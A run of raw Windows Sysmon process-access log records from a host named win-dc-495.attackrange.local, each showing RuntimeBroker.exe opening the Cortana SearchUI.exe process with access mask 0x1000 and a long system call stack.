13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.867{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.851{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 